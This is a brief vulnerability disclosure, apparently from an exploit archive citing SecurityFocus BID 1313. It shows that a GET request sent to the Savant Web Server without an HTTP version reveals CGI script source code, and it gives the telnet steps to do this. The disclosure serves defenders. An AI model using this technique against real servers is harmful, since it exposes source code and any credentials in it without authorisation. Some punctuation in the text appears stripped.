source: wwwsecurityfocuscom/bid/1313/info
Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script
telnet target 80
GET /cgi-bin/scriptxyz HTTP/10
<proper script execution/output>
GET /cgi-bin/scriptxyz
<source code displayed>
...